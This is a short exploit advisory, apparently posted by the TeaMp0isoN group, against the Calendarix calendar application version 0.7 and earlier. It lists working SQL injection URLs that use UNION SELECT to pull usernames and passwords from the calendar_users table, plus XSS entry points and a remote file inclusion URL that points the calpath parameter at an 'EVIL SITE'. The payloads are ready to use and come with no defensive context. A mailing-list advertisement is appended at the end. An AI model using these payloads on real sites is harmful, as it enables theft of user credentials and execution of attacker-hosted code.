############################################################################ # _____ __ __ ___ _ _ _ # # |_ _| ___ __ _ | \/ | _ __ / _ \ (_) ___ ___ | \ | | # # | | / _ \ / _` | | |\/| | | '_ \ | | | | | | / __| / _ \ | \| | # # | | | __/ | (_| | | | | | | |_) | | |_| | | | \__ \ | (_) | | |\ | # # |_| \___| \__,_| |_| |_| | .__/ \___/ |_| |___/ \___/ |_| \_| # ###### |_| ###### # Calendarix <= 0.7 (multiple vulnerabilities) # # [#] Found by: TriCk aka Saywhat? # # [#] Contact: Badnews_saywhat@hotmail.com # # [#] Site: p0ison.org # ############################################################################ ============================================================================ +++++++++++++++++++ Calendarix <= 0.7 (SQL injections) +++++++++++++++++++++ ============================================================================ http://SITE.COM/PATH/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 http://SITE.COM/PATH/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 ============================================================================ ++++++++++++++++++++++++ Calendarix <= 0.7 (XSS) +++++++++++++++++++++++++++ ============================================================================ http://SITE.COM/PATH/calendar.php?/yearcal.php?ycyear= http://SITE.COM/PATH//calendar.php?year= ============================================================================ ++++++++++++++++++++++++ Calendarix <= 0.7 (RFI) +++++++++++++++++++++++++++ ============================================================================ http://SITE.COM/PATH/cal_config.inc.php?calpath= EVIL SITE??? ============================================================================ Gr33tz 2: TeaMp0isoN // Luit // Al_EPiCa // ACiD // Amarilla // p0ison.org ============================================================================ _________________________________________________________________ Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010